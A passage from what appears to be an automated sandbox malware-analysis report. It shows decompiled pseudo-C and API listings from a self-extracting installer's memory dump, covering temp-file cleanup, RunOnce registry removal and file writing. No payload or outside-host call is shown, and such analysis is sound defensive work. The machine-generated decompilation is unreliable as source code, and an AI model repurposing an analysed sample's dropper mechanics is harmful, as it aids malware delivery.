                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                              • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                              • Opcode ID: 0e9a9a094ee0c866a89b50123af3a246fce709f1d14b986570040ac5e066c9d1
                                                                                                                                                                                                                                              • Instruction ID: 70f0159255c6be6ea40552a3c9639e2b099578dc122201c9e21ea273a9202e94
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e9a9a094ee0c866a89b50123af3a246fce709f1d14b986570040ac5e066c9d1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D110873318601ABE3646B715C46F3B61DDDBC9344B51C839F61ED5192FAB98C406125
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                                                              			E009752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR** _t31;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 = __edi;
                                                                                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_t31 =  *0x9791e0; // 0x3077270
                                                                                                                                                                                                                                              				if(_t31 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t29 = _t31;
                                                                                                                                                                                                                                              						if( *0x978a24 == 0 &&  *0x979a30 == 0) {
                                                                                                                                                                                                                                              							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                              							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t31 = _t31[1];
                                                                                                                                                                                                                                              						LocalFree( *_t29);
                                                                                                                                                                                                                                              						LocalFree(_t29);
                                                                                                                                                                                                                                              					} while (_t31 != 0);
                                                                                                                                                                                                                                              					_pop(_t28);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 =  *0x978a20; // 0x0
                                                                                                                                                                                                                                              				_pop(_t32);
                                                                                                                                                                                                                                              				if(_t11 != 0 &&  *0x978a24 == 0 &&  *0x979a30 == 0) {
                                                                                                                                                                                                                                              					_push(_t22);
                                                                                                                                                                                                                                              					E00971781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              					if(( *0x979a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                              						E009765E8( &_v268);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                              					_t22 =  &_v268;
                                                                                                                                                                                                                                              					E00972390( &_v268);
                                                                                                                                                                                                                                              					_t11 =  *0x978a20; // 0x0
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *0x979a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                              					_t11 = E00971FE1(_t22); // executed
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *0x978a20 =  *0x978a20 & 0x00000000;
                                                                                                                                                                                                                                              				return E00976CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(03077270,00000080,?,00000000), ref: 009752F2
                                                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(03077270), ref: 009752FA
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(03077270,?,00000000), ref: 00975305
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(03077270), ref: 0097530C
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(009711FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00975363
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00975334
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              • API String ID: 2833751637-305352358
                                                                                                                                                                                                                                              • Opcode ID: 10506cce489a23441b4b7ea7054e64bf57949d31aedfd6dec743dbff9dfef538
                                                                                                                                                                                                                                              • Instruction ID: 9c3b3f325bb764904404f0b21d8be17da299c78c827e847add5fbf2c8ac468b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10506cce489a23441b4b7ea7054e64bf57949d31aedfd6dec743dbff9dfef538
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F721F033629A04DBDB64AB24ED09B6E37B8FB80751F058569E88E561B0CFF05CC4EB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00971FE1(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				if( *0x978530 != 0) {
                                                                                                                                                                                                                                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                                                                                                              						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                              						return RegCloseKey(_v8);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0097538C,?,?,0097538C), ref: 00972005
                                                                                                                                                                                                                                              • RegDeleteValueA.KERNELBASE(0097538C,wextract_cleanup0,?,?,0097538C), ref: 00972017
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(0097538C,?,?,0097538C), ref: 00972020
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                              • API String ID: 849931509-702805525
                                                                                                                                                                                                                                              • Opcode ID: 543e9ecce879fe79c8fa007bfd117464296727596d94dc7beb204726868d93fb
                                                                                                                                                                                                                                              • Instruction ID: 0b22607c3e02a165bccb343c33b3ae763ad5b9fd2b162732c0a0ab86228bc8c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 543e9ecce879fe79c8fa007bfd117464296727596d94dc7beb204726868d93fb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0E04F376A4318BBDB218B90EC0EF5E7B6DF781745F100198B90CA0060EB615A94E715
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
E00974CD0(char* __edx, long _a4, int _a8) {
	signed int _v8;
	char _v268;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t29;
	int _t30;
	long _t32;
	signed int _t33;
	long _t35;
	long _t36;
	struct HWND__* _t37;
	long _t38;
	long _t39;
	long _t41;
	long _t44;
	long _t45;
	long _t46;
	signed int _t50;
	long _t51;
	char* _t58;
	long _t59;
	char* _t63;
	long _t64;
	CHAR* _t71;
	CHAR* _t74;
	int _t75;
	signed int _t76;

	_t69 = __edx;
	_t29 =  *0x978004; // 0x694569f9
	_t30 = _t29 ^ _t76;
	_v8 = _t30;
	_t75 = _a8;
	if( *0x9791d8 == 0) {
		_t32 = _a4;
		__eflags = _t32;
		if(_t32 == 0) {
			_t33 = E00974E99(_t75);
			L35:
			return E00976CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
		}
		_t35 = _t32 - 1;
		__eflags = _t35;
		if(_t35 == 0) {
			L9:
			_t33 = 0;
			goto L35;
		}
		_t36 = _t35 - 1;
		__eflags = _t36;
		if(_t36 == 0) {
			_t37 =  *0x978584; // 0x0
			__eflags = _t37;
			if(_t37 != 0) {
				SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
			}
			_t54 = 0x9791e4;
			_t58 = 0x9791e4;
			do {
				_t38 =  *_t58;
				_t58 =  &(_t58[1]);
				__eflags = _t38;
			} while (_t38 != 0);
			_t59 = _t58 - 0x9791e5;
			__eflags = _t59;
			_t71 =  *(_t75 + 4);
			_t73 =  &(_t71[1]);
			do {
				_t39 =  *_t71;
				_t71 =  &(_t71[1]);
				__eflags = _t39;
			} while (_t39 != 0);
			_t69 = _t71 - _t73;
			_t30 = _t59 + 1 + _t71 - _t73;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				L3:
				_t33 = _t30 | 0xffffffff;
				goto L35;
			}
			_t69 = 0x9791e4;
			_t30 = E00974702( &_v268, 0x9791e4,  *(_t75 + 4));
			__eflags = _t30;
			if(__eflags == 0) {
				goto L3;
			}
			_t41 = E0097476D( &_v268, __eflags);
			__eflags = _t41;
			if(_t41 == 0) {
				goto L9;
			}
			_push(0x180);
			_t30 = E00974980( &_v268, 0x8302); // executed
			_t75 = _t30;
			__eflags = _t75 - 0xffffffff;
			if(_t75 == 0xffffffff) {
				goto L3;
			}
			_t30 = E009747E0( &_v268);
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			 *0x9793f4 =  *0x9793f4 + 1;
			_t33 = _t75;
			goto L35;
		}
		_t44 = _t36 - 1;
		__eflags = _t44;
		if(_t44 == 0) {
			_t54 = 0x9791e4;
			_t63 = 0x9791e4;
			do {
				_t45 =  *_t63;
				_t63 =  &(_t63[1]);
				__eflags = _t45;
			} while (_t45 != 0);
			_t74 =  *(_t75 + 4);
			_t64 = _t63 - 0x9791e5;
			__eflags = _t64;
			_t69 =  &(_t74[1]);
			do {
				_t46 =  *_t74;
				_t74 =  &(_t74[1]);
				__eflags = _t46;
			} while (_t46 != 0);
			_t73 = _t74 - _t69;
			_t30 = _t64 + 1 + _t74 - _t69;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				goto L3;
			}
			_t69 = 0x9791e4;
			_t30 = E00974702( &_v268, 0x9791e4,  *(_t75 + 4));
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
                                                                                                                                                                                                                                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                              						_t30 = E00974C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						E00974B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                              						__eflags = _t50;
                                                                                                                                                                                                                                              						if(_t50 != 0) {
                                                                                                                                                                                                                                              							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                              							__eflags = _t51;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t51 = 0x80;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t33 = 1;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t30 = _t44 - 1;
                                                                                                                                                                                                                                              					__eflags = _t30;
                                                                                                                                                                                                                                              					if(_t30 == 0) {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a4 == 3) {
                                                                                                                                                                                                                                              					_t30 = E00974B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                                                                              			}

                                                                                                                                                                                                                                              0x00974d4c
                                                                                                                                                                                                                                              0x00974d4f
                                                                                                                                                                                                                                              0x00974d4f
                                                                                                                                                                                                                                              0x00974d51
                                                                                                                                                                                                                                              0x00974d52
                                                                                                                                                                                                                                              0x00974d52
                                                                                                                                                                                                                                              0x00974d56
                                                                                                                                                                                                                                              0x00974d5b
                                                                                                                                                                                                                                              0x00974d5d
                                                                                                                                                                                                                                              0x00974d62
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d67
                                                                                                                                                                                                                                              0x00974d6f
                                                                                                                                                                                                                                              0x00974d74
                                                                                                                                                                                                                                              0x00974d76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d7c
                                                                                                                                                                                                                                              0x00974d84
                                                                                                                                                                                                                                              0x00974d89
                                                                                                                                                                                                                                              0x00974d8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d94
                                                                                                                                                                                                                                              0x00974d99
                                                                                                                                                                                                                                              0x00974d9e
                                                                                                                                                                                                                                              0x00974da1
                                                                                                                                                                                                                                              0x00974daa
                                                                                                                                                                                                                                              0x00974daa
                                                                                                                                                                                                                                              0x00974da3
                                                                                                                                                                                                                                              0x00974da3
                                                                                                                                                                                                                                              0x00974da3
                                                                                                                                                                                                                                              0x00974db5
                                                                                                                                                                                                                                              0x00974dbb
                                                                                                                                                                                                                                              0x00974dbd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974dc3
                                                                                                                                                                                                                                              0x00974dc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974dc5
                                                                                                                                                                                                                                              0x00974dbd
                                                                                                                                                                                                                                              0x00974d2a
                                                                                                                                                                                                                                              0x00974d2a
                                                                                                                                                                                                                                              0x00974d2d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974d2d
                                                                                                                                                                                                                                              0x00974cf8
                                                                                                                                                                                                                                              0x00974cfd
                                                                                                                                                                                                                                              0x00974d02
                                                                                                                                                                                                                                              0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00974DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00974DDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 3625706803-305352358
• Opcode ID: ddde63e4c064993b921a285d8d9a6bb87778fae4ea5d62707d6b2241973dfc54
• Instruction ID: 28e56e828a7134275f43cc83cd03f50af25582d8f7a361f15805594af94813c0
• Opcode Fuzzy Hash: ddde63e4c064993b921a285d8d9a6bb87778fae4ea5d62707d6b2241973dfc54
• Instruction Fuzzy Hash: 0841E2372041019BCB359E28D9546F973A9EB85710F04C668E8CE972D7DB71EE86C750
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00974C37(signed int __ecx, int __edx, int _a4) {
	struct _FILETIME _v12;
	struct _FILETIME _v20;
	FILETIME* _t14;
	int _t15;
	signed int _t21;

	_t21 = __ecx * 0x18;
	if( *((intOrPtr*)(_t21 + 0x978d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
		L5:
		return 0;
	} else {
		_t14 =  &_v12;
		_t15 = SetFileTime( *(_t21 + 0x978d74), _t14, _t14, _t14); // executed
		if(_t15 == 0) {
			goto L5;
		}
		return 1;
	}
}









APIs
• DosDateTimeToFileTime.KERNEL32 ref: 00974C54
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00974C66
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00974C7E
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: 49f004576835a5bd4f4d764115516323fe1d4e1b9f9b1b68354f9b62dc77f0f9
• Instruction ID: 81eec9f2daff137f6240977c1682e81757026e8a1fe4b24367bd3971bcec7ffb
• Opcode Fuzzy Hash: 49f004576835a5bd4f4d764115516323fe1d4e1b9f9b1b68354f9b62dc77f0f9
• Instruction Fuzzy Hash: 47F0907361520CAF9B25DFB4CC48DFB77ACEB44340B48892AA86DC1051EB30D954D7A6
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E0097487A(CHAR* __ecx, signed int __edx) {
	void* _t7;
	CHAR* _t11;
	long _t18;
	long _t23;

	_t11 = __ecx;
	asm("sbb edi, edi");
	_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
	if((__edx & 0x00000100) == 0) {
		asm("sbb esi, esi");
		_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
	} else {
		if((__edx & 0x00000400) == 0) {
			asm("sbb esi, esi");
			_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
		} else {
			_t23 = 1;
		}
	}
	_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
	if(_t7 != 0xffffffff || _t23 == 3) {
		return _t7;
	} else {
		E0097490C(_t11);
		return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
	}
}

APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00974A23,?,00974F67,*MEMCAB,00008000,00000180), ref: 009748DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00974F67,*MEMCAB,00008000,00000180), ref: 00974902
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_970000_file.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3b16cf9f5297afa35b1fed61b5092fd1f1cf67567c3d6cc9cccee9c584a191d8
• Instruction ID: d2aeee86fb23cb3c19b6ce29cff9c5e5a054509f2400f5245ffb0221575c85f1
• Opcode Fuzzy Hash: 3b16cf9f5297afa35b1fed61b5092fd1f1cf67567c3d6cc9cccee9c584a191d8
• Instruction Fuzzy Hash: 31014BA3E1557426F32440294C88FF7551CDBDAB35F1B4735BEAEE71D2D6644C0481E1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00974AD0(signed int _a4, void* _a8, long _a12) {
	signed int _t9;
	int _t12;
	signed int _t14;
	signed int _t15;
	void* _t20;
	struct HWND__* _t21;
	signed int _t24;
	signed int _t25;

	_t20 =  *0x97858c; // 0x268
	_t9 = E00973680(_t20);
	if( *0x9791d8 == 0) {
		_push(_t24);
		_t12 = WriteFile( *(0x978d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
		if(_t12 != 0) {
			_t25 = _a12;
			if(_t25 != 0xffffffff) {
				_t14 =  *0x979400; // 0xcf400
				_t15 = _t14 + _t25;
				 *0x979400 = _t15;
				if( *0x978184 != 0) {
					_t21 =  *0x978584; // 0x0
					if(_t21 != 0) {
						SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x9793f8, 0);
					}
				}
			}
		} else {
			_t25 = _t24 | 0xffffffff;
		}
		return _t25;
	} else {
		return _t9 | 0xffffffff;
	}
}

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00973680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0097369F
                                                                                                                                                                                                                                                • Part of subcall function 00973680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736B2
                                                                                                                                                                                                                                                • Part of subcall function 00973680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009736DA
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00974B05
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084409-0
                                                                                                                                                                                                                                              • Opcode ID: 860fd14ddb49cd293bed24b3e131acfa3c5c82baf1266d8292af6c0b7f20d20f
                                                                                                                                                                                                                                              • Instruction ID: 955e0153505aa0aa35a32428d84faa97f1686803b09a5756d53dc79cf1f19b40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 860fd14ddb49cd293bed24b3e131acfa3c5c82baf1266d8292af6c0b7f20d20f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0016D33254211ABD7148F58DC09BAA7769E784725F04C265F93D961E1CB70DC92DB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E0097658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                                                                              				char* _t6;
                                                                                                                                                                                                                                              				char* _t8;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				char* _t16;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				char* _t19;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = __ecx;
                                                                                                                                                                                                                                              				_t10 = __edx;
                                                                                                                                                                                                                                              				_t17 = __ecx;
                                                                                                                                                                                                                                              				_t1 = _t17 + 1; // 0x978b3f
                                                                                                                                                                                                                                              				_t12 = _t1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t4 =  *_t17;
                                                                                                                                                                                                                                              					_t17 = _t17 + 1;
                                                                                                                                                                                                                                              				} while (_t4 != 0);
                                                                                                                                                                                                                                              				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                              				_t2 = _t18 + 1; // 0x978b40
                                                                                                                                                                                                                                              				if(_t2 < __edx) {
                                                                                                                                                                                                                                              					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                              					if(_t19 > __ecx) {
                                                                                                                                                                                                                                              						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                              						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                              							 *_t19 = 0x5c;
                                                                                                                                                                                                                                              							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t6 = _a4;
                                                                                                                                                                                                                                              					 *_t19 = 0;
                                                                                                                                                                                                                                              					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                              						_t6 = _t6 + 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return E009716B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0x8007007a;
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(00978B3E,00978B3F,00000001,00978B3E,-00000003,?,009760EC,00971140,?), ref: 009765BA
                                                                                                                                                                                                                                              Memory Dump Source
